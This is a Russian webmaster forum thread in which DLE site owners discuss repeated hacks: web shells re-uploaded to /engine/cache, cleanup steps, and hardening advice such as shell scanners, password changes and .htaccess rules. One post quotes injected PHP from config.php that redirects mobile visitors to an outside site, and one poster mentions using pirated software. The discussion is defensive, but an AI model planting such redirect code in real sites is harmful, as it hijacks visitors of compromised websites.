vip-moto

Рейтинг
192
Регистрация
23.09.2009
tito.su:
Думаю, вам надо обратиться к телекомпанию, которая снимает шоу про предсказателей (я телек не смотрю, не помню как точно называется), там вам 100% помогут.

А тут я не видел еще таких людей, которые помогли бы вам по "чисто тематическим страницам"

Охх, пошутил) Петросян прям.🤪

Добавил текста на страницу, запрос просел на -5. Подождать, или вернуть старый текст?

Что за фигня, начал закупаться ссылками вначали в вверх прыгнул щас с каждым апом вниз.

Взломали)) но не у меня.

http://forum.dle-news.ru/index.php?showtopic=62025

следим за топиком. Тут у парня лицуха и ломают. Так что ждем что целкасофт скажет))

siv1987:
Ищите шеллы, меняйте пароли, обращайтесь к специалистам.

Щас вот на денвере в лицуху внесу изменения и буду лить. Я манал этот нулл.

Korew:
Спасибо за дельный совет, а проблему решать в принципе не нужно? ))

Поставил заплатки та же херня что и раньше. Все равно залил.

Chingiz Mammadov:
У меня тоже такая проблема.

Ребята кто то смог источник найти этого г**но ?

1. Проскандировал shelldetect.php (посоветовали в другой теме)

2. Вычистил эту дрянь.

3. Расставил права на папки как положено.

4. Сменил паролли от бд, админки, хостинга, фтп (вообщем все.). Так как открывал этот шелл и там полный доступ к бд и ко всем файлам.

super_keks:
Сегодня нашел в config.php

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');

как лезут не знаю...

О вам льет шелл тот же человек что и мне)))

гляньте еще тут /engine/init.php где то в середине у меня туда же залил.

Щас вот поставил заплатки с сайта Dle news, сменил пароли. Вот сижу жду пока обьявится. Еще прогоните shelldetect мне посоветовали, через него нашел где еще эта зараза.

kgtu5:
а если начать с простого:
1. какой антивирус на компе?
2. фтп клиент?
3. пароли менял?
4. в ту директорию .htaccess -> php_flag engine off
5. 555 на ту директорию куда закидывают

---------- Добавлено 07.01.2013 в 00:31 ----------

и смотри время создания левых файлов, потом access.log и error.log в это время, возможно найдешь запрос который делается...

1. Касперский 2013. Стоит в браузере модуль безопастной авторизации от касперского. Комп сканировал пусто

2. FilleZila

3. менял

4.лежит)

5. /engine/cache льют сюда. Ставлью 555 вырубается кеширование

kgtu5:
обновления установлены?

Да. 3 день подряд я сношу шелл, он его льет снова.

Всего: 662